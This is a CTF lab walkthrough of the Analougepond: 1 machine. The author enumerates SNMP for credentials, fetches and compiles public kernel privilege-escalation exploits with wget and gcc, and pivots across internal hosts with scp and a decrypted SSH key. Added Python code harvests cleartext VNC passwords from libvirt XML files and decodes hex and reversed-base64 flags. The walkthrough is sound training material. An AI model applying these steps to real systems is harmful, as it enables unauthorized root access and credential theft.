Analougepond: 1

Difficulty: Intermediate

Posted by Admin on March 16, 2020

CTF link

Good day. Today I will walk through Analougepond: 1 by knightmare. To consider the machine fully rooted, I need all of the following:

  • Troll Flag
  • Flag 1
  • Flag 2
  • Have root everywhere
  • User passwords
  • 2 VNC passwords

    Scan

    A UDP scan with nmap turned up an interesting open port, 161/udp (SNMP), so I moved on to enumerating it.

    nmap -sU 192.168.2.100

    snmp-check walks the SNMP tree and shows a probable username, "eric", together with the hint "There is a house in New Orleans they call it ..."

    A quick search completes the lyric: the song is "The House of the Rising Sun", so the password is "therisingsun", and I now have a username and a password:

    snmp-check 192.168.2.100
    eric:therisingsun

    Troll flag and 1st root

    To get root, I use a local privilege-escalation exploit matching the kernel reported by uname -a, 3.19.0-25-generic (Exploit-DB 39166, the overlayfs exploit). As with any kernel exploit, it can crash the box, so take a snapshot first.

    uname -a
    https://www.exploit-db.com/exploits/39166
    wget https://www.exploit-db.com/raw/39166
    mv 39166 exp.c
    gcc exp.c -o exp
    ./exp

    After escalating, I go to /root and find the troll flag.

    VNC passwords

    libvirt keeps each guest's domain definition under /etc/libvirt/qemu/ as an XML file, and a guest's VNC console password is stored there in clear text, as the passwd attribute of the <graphics type='vnc'> element. These files are normally readable only by root, which is why the first root was needed. In that directory I find two XML files, each containing a password.

    A grep for passwd over the two files pulls out the passwords:

    barringsbank.xml:memphistennessee
    puppet.xml:sendyoubacktowalker

    The file names look like hostnames, but where are these hosts?

    Way to puppet

    /etc/hosts lists hosts whose names match the XML files that held the VNC passwords.
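The two lookups above (pull every VNC password out of the libvirt domain XML, then match the domain names against /etc/hosts) as an added example, not code from the original post. The domain XML and hosts file below are constructed to match the shape of real libvirt configs and the values the walkthrough reports; the real files are read from /etc/libvirt/qemu/ as root.

```python
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, Optional, Tuple

# Constructed sample input: two libvirt domain definitions in the shape of
# /etc/libvirt/qemu/<name>.xml. libvirt stores a guest's VNC console password
# in clear text as the passwd= attribute of <graphics type='vnc'>. Only the
# password values and domain names are taken from the walkthrough.
SAMPLE_DOMAIN_XML: Dict[str, str] = {
    "puppet.xml": """<domain type='kvm'>
  <name>puppet</name>
  <devices>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
  </devices>
</domain>
""",
    "barringsbank.xml": """<domain type='kvm'>
  <name>barringsbank</name>
  <devices>
    <graphics type='spice' port='-1' autoport='yes'/>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='memphistennessee'/>
  </devices>
</domain>
""",
}

# Constructed /etc/hosts; the two guest addresses are the ones the walkthrough connects to.
SAMPLE_HOSTS = """127.0.0.1   localhost
# libvirt guests
192.168.122.2   puppet
192.168.122.3   barringsbank
"""


def load_domain_dir(path: str = "/etc/libvirt/qemu") -> Dict[str, str]:
    """Read every *.xml in a libvirt config directory (needs root on a real host)."""
    return {p.name: p.read_text() for p in Path(path).glob("*.xml")}


def vnc_password(xml_text: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (domain name, VNC password) from one domain XML; password is None if unset."""
    root = ET.fromstring(xml_text)
    name = root.findtext("name")
    for graphics in root.iter("graphics"):
        if graphics.get("type") == "vnc":
            return name, graphics.get("passwd")  # None when the console has no password
    return name, None


def collect_vnc_passwords(domains: Dict[str, str]) -> Dict[str, str]:
    """Map domain name -> VNC password for every domain that has one."""
    found: Dict[str, str] = {}
    for filename, xml_text in domains.items():
        name, passwd = vnc_password(xml_text)
        if passwd:
            found[name or filename.rsplit(".", 1)[0]] = passwd
    return found


def parse_hosts(text: str) -> Dict[str, str]:
    """Map every hostname and alias in an /etc/hosts file to its address; comments ignored."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            table[name] = addr
    return table


def vnc_targets(domains: Dict[str, str], hosts_text: str) -> Dict[str, Tuple[str, str]]:
    """Join the two sources: domain name -> (address from /etc/hosts, VNC password)."""
    hosts = parse_hosts(hosts_text)
    return {
        name: (hosts.get(name, "?"), passwd)
        for name, passwd in collect_vnc_passwords(domains).items()
    }


if __name__ == "__main__":
    for name, (addr, passwd) in vnc_targets(SAMPLE_DOMAIN_XML, SAMPLE_HOSTS).items():
        print(f"{name:14} {addr:16} vnc password: {passwd}")
```

On a live host, replace SAMPLE_DOMAIN_XML with load_domain_dir() and SAMPLE_HOSTS with the contents of /etc/hosts; a domain whose address comes back as "?" has a VNC password but no hosts entry, so it has to be located another way.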

    Connecting to host 192.168.122.2, I am greeted by a message that hints at the user.

    The text tells us the username is "sandieshaw". Back to Google: Sandie Shaw's best-known song is "Puppet on a String" (https://www.youtube.com/watch?v=uQQtKqF30a8). Remove the spaces, lowercase it, and that is the password:

    sandieshaw:puppetonastring

    2nd root and 1st flag

    Here I apply a kernel exploit again, this time for kernel version 4.4.0-57-generic (Exploit-DB 43418). gcc is not installed on puppet, so the exploit has to be compiled on analoguepond and copied over with scp.

    # on analoguepond
    wget https://www.exploit-db.com/raw/43418
    mv 43418 exp2.c
    gcc exp2.c -o exp2
    scp exp2 sandieshaw@192.168.122.2:/tmp
    # on puppet, as sandieshaw
    chmod +x /tmp/exp2
    /tmp/exp2

    Now I can start looking for the flag.

    In /root I find three files: melvin, jim and flag1.txt.0xff. The flag file is hex; translating it to ASCII gives base64 written backwards, and reversing that and base64-decoding it yields the following:

    https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

    I also find a hidden directory, "I_have_you_now", at the bottom of which are two files: my_world_you_are_persistent_try and nlesson_key.gpg.

    my_world_you_are_persistent_try:joshua

    nlesson_key.gpg is gpg-encrypted and I need the passphrase. Now the Mr. Potato Head clue makes sense: after watching the video linked in the flag, I realize the passphrase is the word "secret" (backdoors are not SECRETS).

    gpg nlesson_key.gpg    # passphrase: secret

    Decrypting nlesson_key.gpg yields an SSH private key, and the file name suggests the user is nlesson.

    Way to barringsbank

    Connecting with the key, I enter "joshua" from the my_world_you_are_persistent_try file as the key's passphrase and land a shell as nlesson.

    3rd root and 2nd flag

    The exploit from the second host also roots the last one, since both run the same kernel, so it is scp again.

    I download the exploit on host 192.168.2.101, send the compiled binary with scp to host 192.168.122.2, and from there on to host 192.168.122.3.

    # on analoguepond
    wget https://www.exploit-db.com/raw/43418
    mv 43418 2exp.c
    gcc 2exp.c -o 2exp
    scp 2exp sandieshaw@192.168.122.2:/tmp
    # on puppet, as root, with the decrypted key saved as /root/.ssh/nleeson_key
    scp -i /root/.ssh/nleeson_key /tmp/2exp nlesson@192.168.122.3:/home/nleeson/
    # on barringsbank, as nlesson
    cd /home/nleeson
    chmod +x 2exp
    ./2exp

    In root's home directory I find nothing but a picture, me.jpeg, and after about fifteen minutes I realize the flag is hidden inside it. To get it out I use steghide. I copy the picture to my Kali box with scp again (alternatively, base64-encode it, paste the text into a file on Kali and decode it back into the image).

    The passphrase is the name of a file I kept finding in users' home directories, "reticulatingsplines":

    reticulatingsplines

    The extracted file is hex again. To decode it I translate the hex to ASCII, which gives reversed base64; reversing that and base64-decoding it gives the flag.
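Both flags (flag1.txt.0xff above and the file extracted from me.jpeg here) use the same three layers, so one decoder covers both. This is an added example, not the author's code; SAMPLE_BLOB is a constructed blob built with the same layering, not either real flag.

```python
import base64
import binascii
import sys


def decode_flag(hex_blob: str) -> bytes:
    """hex text -> raw bytes (base64 written backwards) -> reverse -> base64-decode."""
    compact = "".join(hex_blob.split())  # tolerate line breaks and a trailing newline
    try:
        mirrored_b64 = binascii.unhexlify(compact)  # upper- or lower-case hex both work
    except binascii.Error as exc:
        raise ValueError(f"input is not clean hex: {exc}") from exc
    forward_b64 = mirrored_b64.strip()[::-1]  # drop stray whitespace, then undo the mirroring
    try:
        return base64.b64decode(forward_b64, validate=True)
    except binascii.Error as exc:
        raise ValueError("reversed text is not valid base64; wrong layer order?") from exc


def encode_like_flag(plaintext: bytes) -> str:
    """Inverse of decode_flag: base64, mirror, hex. Used only to build test data."""
    return binascii.hexlify(base64.b64encode(plaintext)[::-1]).decode("ascii")


# Constructed sample blob, not the real flag.
SAMPLE_BLOB = encode_like_flag(b"constructed sample flag, not the real one")


if __name__ == "__main__":
    # Usage: python3 decode_flag.py flag1.txt.0xff   (or pipe the hex on stdin)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else sys.stdin.read()
    sys.stdout.write(decode_flag(data).decode("utf-8", errors="replace") + "\n")
```

validate=True is deliberate: if the hex is decoded but not reversed, the leading "=" padding makes b64decode fail loudly instead of returning garbage, which is the usual symptom of applying the layers in the wrong order.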

    That's all. Thanks, knightmare, it was a very interesting and fascinating machine.